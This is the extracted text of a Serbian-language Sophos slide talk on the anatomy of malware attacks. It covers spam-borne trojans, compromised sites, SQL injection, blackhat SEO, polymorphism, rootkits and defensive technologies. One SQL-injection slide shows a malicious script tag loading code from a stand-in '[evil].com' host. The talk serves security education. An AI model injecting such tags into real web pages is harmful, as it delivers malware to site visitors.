anatomija napada – duhovi u mašini

Vanja Svajcer

Principal Researcher – Sophos

Beograd, 13 Maj 2010

Anatomija napada – duhovi u mašini

Šta radi SophosLabs?

Sakuplja pretnje

Analizira i klasifikuje

Kreira detekcije i otklanja pretnje

Objavljuje sveže definicije i informacije

Istraživanje i razvoj

Nešto više informacija videćemo kasnije

2

SophosLabs u samom centru

4

Anatomija napada

Postavljanje scenarija

Zlonamerni softver (Malware)

Tehnike napada

Proces analize i alati

Tehnologija zaštite

5

Tipovi malicioznog softvera

Virus

Trojanac

Crv (Worm)

Ko se nekada bavio pisanjem virusa?

Nema „standardnog“ pisca virusa, nema „standardnog“ motiva

za pisanje

Školarci

Srednjoškolci

Studenti

IT profesionalci

Uglavnom muškarci

Nikako A/V kompanije

Ko piše malver danas?

Virusi se retko viđaju, ali čini se da opet postaju popularni

U pitanju je novac

U osnovi se svodi na kriminal

( I dalje postoji tamo neki pegavi tinejdžer …)

10

APT

Advanced Persistent Threat

Moderan izraz za “targeted malware”

Mala veličina (oko 100k) i posebne namene

Nema pakovanja

Izgleda kao legitiman Windows fajl

Neovlašćeni prikriveni transfer podataka (Data Exfiltration)

Težak za uklanjanje

11

Email pretnje

Druga polovina 2008. bila je svedok

dramatičnog porasta malvera

u obliku priloga email-a

2009. taj trend se nastavlja,

nekoliko familija se širi agresivnim

masovnim spemovanjem

Iste stare taktike socijalnog inženjeringa

UPS/FedEx failed delivery

reports, Microsoft patches,

Airline e-tickets itd.

12

0% 10% 20% 30% 40%

ThreatMal/Bredo-A

W32/MyDoom-OTroj/Bredo-GTroj/Invo-Zip

Troj/BredoZp-CTroj/Agent-LGEMal/EncPk-KP

Mal/WaledPak-AMal/BredoZp-A

Mal/EncPk-JXOther

15.9%8.9%8.5%

5.8%5.4%4.8%4.7%

3.5%3.3%3.2%

36.0%

Top spemovani malver (2009)

Dominiraju ključne familije malvera

Bredo

Waled

Jednostavno

ali i dalje

radi!

Socijalni inženjering – Bredo

Mal/Bredo

Ista kampanja može obuhvatati brojne “različite” priloge

Socijalni inženjering – Zbot (aka Zeus)

Mal/Zbot

Bredo vs Zbot

Konkurencija između botova!!!

Bredo pokušava da onemogući bilo koji instalirani Zbot

Vrlo slično poput Netsky vs Bagle rata od pre par godina!!!

16

Email pretnje

Globalne spem zamke za praćenje spema

SAD usmerava više spema nego bilo koja druga pojedinačna

država

Kompromitovani računari ne samo što šire spem već

distribuiraju malver i

lansiraju DDoS napade

0% 10% 20% 30% 40% 50%

United StatesBrazilIndia

ChinaRepublic of Korea

TurkeyPoland

VietnamRussian Federation

SpainOther

15%

11%

5%

5%

5%

4%

4%

3%

3%

3%

42%

17

Web najdominantniji

99% inficiranih sistema su legitimni kompromitovani sajtovi

Sajtovi za napad

Botnet C&C korišćenjem HTTP

Napadi i dalje često počinju spemovanjem email-a

18

Napadi Web 2.0 aplikacija

Korak 1: preusmeravanje sa kompromitovanog sajta

Kompromitovani web sajtovi

Attacker-controlled

redirects

Payload

Attack site using

bundle of exploits

21

Kompromitovanje hostova

SQL injection

Hakeri koriste alate da identifikuju

stranice potencijalno ranjive na SQL

injection

Šalju maliciozne HTTP zahteve (Demo)

DBDB

DB

Malicious SQLinjection

SQL injection

SQL injection uzrokuje da baza podataka postane zabiberena

malicioznim skript tagovima

Kao rezultat, stranice na web serveru izgrađene od podataka

preuzetih iz baze takođe sadrže maliciozne skript tagove

<script src=http://[evil].com/file.js

<script src=http:/

<script src=http:/

<script src=http:/

<script src=http:/

<script src=http:/

<script src=http:/

<script src=http:/

SQL injection

Korisnik se kreće web sajtom

Maliciozni skript tag prikriveno učitava

skript sa udaljenog servera

Žrtva postaje inficirana malverom:

Asprox trojan

25

Demo SQLi + XSS

26

Novootkrivene inficirane stranice – april 2010

27

Blackhat SEO

Kompromitovani hostovi zasejani sa SEO-kitovima

Povećavaju rangiranje stranice

SEO trovanje

Pretraga po popularnim rečima

29

Blackhat SEO

30

Blackhat SEO

31

Demo Blackhat SEO

Vidljivost – sajtovi koji hostuju SEO-kitove

Korak 3: Preuzimanje sadržaja sa napadačevog sajta

Kompromitovani web sajtovi

Preusmeravanja koja

kontroliše napadač

Payload

Sajt za napad koristi

više kombinovanih ranjivosti

Web napadi

Izrađen korišćenjem

kupljenih kompleta alata

MPack, IcePack, GPack,

Neosploit, Eleonore, Yes

Konzola za upravljanje

Phishing

Otkriven: 19. oktobra 2009.

Najpogođenije države:

Francuska – 4%

SAD – 17%

Velika Britanija – 3%

Nemačka – 6%

Web napadi

Pregled po programima

za pregled Internet

sadržaja!

Polimorfizam sa

serverske strane

Procenat pogođenih:

MSIE – 12%

FireFox – 1%

Opera – 5%

36

Polimorfizam

37

Polimorfizam

38

Polimorfizam

39

Polimorfizam

40

Polimorfizam

41

Slabosti polimorfnog malvera

Poly-engine je deo koda

Može biti reverzovan od strane upornog istraživača

Mora biti dekriptovan u memoriji

Emulira programski kod dok se ne nađe prava varijanta

Detekcija može biti bazirana po proceduri dekripcije

42

Polimorfizam sa serverske strane

43

Polimorfizam sa serverske strane

44

Polimorfizam sa serverske strane

45

Polimorfizam sa serverske strane

46

Demo SSP

Korak 4: Napadni žrtve kroz ranjivosti, zarazi ih

Kompromitovani web sajtovi

Preusmeravanja koja

kontroliše napadač

Tovar

Sajt za napad koristi

više kombinovanih ranjivosti

Lažni AV profesionalizam

49

Video - scareware

Troj/MacSwp

50

51

Zeus (Zbot)

Komplet za kreiranje botneta i malvera za krađu informacija

Builder

Loader

Control panel

52

Demo Zbot

53

Zeus (Zbot) - tracker

54

Rootkitovi

Programi koji koriste različite tehnike da sakriju svoje prisustvo

na računaru

Trojanci

Legitimni programi?

Šta Rootkitovi rade?

Anti-Virus

skener

Operativni

sistemRootkit

Listanjefajlova

Memo.doc

Sales.xls

Phish.exe

Sophos.ppt

Memo.doc

Sales.xls

Phish.exe

Sophos.ppt

Listanjefajlova

56

Demo rootkit

57

Vrhunski rootkitovi

TDSS (TDL3)

MS10-015 update

Vrhunski rootkitovi – Sinowal (Mebroot)

Inficira MBR (poput starih boot sektor virusa)

Modifikuje OS loader da učita maliciozni drajver

Drajver sakriva maliciozni MBR (stealth)

Instalira prilagođeni mrežni stek

Sadrži backdoor (enkriptovana HTTP komunikacija)

Tovar – ubrizgava maliciozne DLL-ove

Pseudo-nasumično generisanje URL-ova za update (dnevni)

Hard disk

Rootkitovi – Sinowal (Mebroot)

BIOS

initializationMBR Boot loader

Early kernel

initialization

CPU Real mode

BIOS services

Kernel

initialization

CPU Protected mode

User process

Window servicesWindow services

MBR Boot loaderEarly kernel

initializationUser process

Sinowal

dropper

User process

Endpoint

securityRead

MBR

Sinowal geografsko širenje (Sinowal, Feb-Mar 2010)

61

Vrhunski rootkitovi budućnosti

Rootkitovi za virtualizaciju

Softver (Subvirt)

Uz pomoć hardvera (Bluepill, Vitriol)

Bootkitovi (eEye, vBootkit, Stoned)

SMM bazirani rootkitovi

Bios/EFI bazirani rootkitovi?

Rootkitovi za virtualizaciju

Hardver

Aplikacija 1

Aplikacija 2 VMM

OSg1 OSg2

OSRootkit za

virtualizaciju

Rootkitovi za virtualizaciju

Hardver

OSg3

Rootkit za virtualizaciju – maliciozni hipervizor

OSg2OSg1Domen 0

SophosLabs™

65

Pregled

50000

SophosLabs sistemi

67

Demo lab sistemi

68

Tehnologija zaštite

Inspekcija sadržaja (klasično skeniranje)

Detekcija na bazi ponašanja (HIPS)

Reputacija

Domen

Fajl

Životni ciklus familije malvera

Prvi član

porodiceAnaliza Detekcija TEST Objava

Sledeći

član

porodica

Karakteristike familije

Identične osnovne funkcionalnosti

Nove varijante mogu imati dodatne funkcionalnosti

Linije koda se ponovo upotrebljavaju

Nakon rekompilacije, nova varijanta je binarno različita

Tradicionalno skeniranje nije efikasno za proaktivnu detekciju

familije

Zahteva analizu na funkcionalnom nivou

Grafički prikaz aplikativnih zahteva

Spakovan -> Raspakovan

„Runtime behavioral“ zaštita

Nadopunjuje Behavioral Genotype

Proverava ponašanje procesa primenjeno na sistemu

Proverava sve pokrenute procese na znake malicioznih

modifikacija sistemskih objekata

Fajlove

Registry unose

Procese

Mrežne konekcije

Učitane drajvere

Registracija u run ključu

Uprošćena runtime arhitektura

Privileged – kernel mode

Non-privileged – user mode

- Pokreće se proces virus.exe... - Hmmm, OK. Skeniram na viruse… - Ništa nije pronađeno.- Virus.exe otvara registry run ključ...- Zanimljivo. Reci mi nešto više o tome.- Virus.exe se registruje u run ključ…- Hmmm, ne, to nije OK. Blokiraj

operaciju!!!- Operacija blokirana.- Hvala ti kernele!- Izveštavam o ponašanju.

Virus.exe

Buffer overflow zaštita

Generička tehnologija za detekciju zloupotrebe propusta

(uključujući tzv. zero day zloupotrebe)

Nadopunjuje Windows DEP

Detektuje različite buffer overflow napade

Stack

Heap

Return to lib C

Štiti Microsoft i ne-Microsoft procese, uglavnom sa klijentske

strane

Buffer overflow – uprošćena arhitektura

- Preuzimam fajl…- Zanimljivo, odakle dolaziš?- Internet Explorer programski kod.- OK.- Preuzimam fajl2...- Oh, ne opet. Odakle dolaziš?- Stack.- Oh, ne. Buffer overflow detektovan!!!- Suspendujem proces.- Prijavljujem ponašanje.

Iexplore.exe

77

Cloud computing

78

Cloud zaštita

Pretrage u realnom vremenu

Povratne informacije u realnom vremenu (zaštita zajednice)

Socijalno umrežavanje vezano za bezbednost

Premošćavanje prekida u zaštiti

Unapređenje vremena odziva

79

Proaktivno vs reaktivno

80

Zaključak

Malver postaje sve kompleksniji

Finansijska motivacija

Usmereni (targeted) malver može predstavljati izazov

Security zajednica ne gubi bitku

Stalno se razvijaju nove metode

Tehnologija ne predstavlja „srebrni metak“

vanja.svajcer@sophos.com

Blog: http://www.sophos.com/blogs/sophoslabs

Twitter: http://twitter.com/sophoslabs

Pitanja?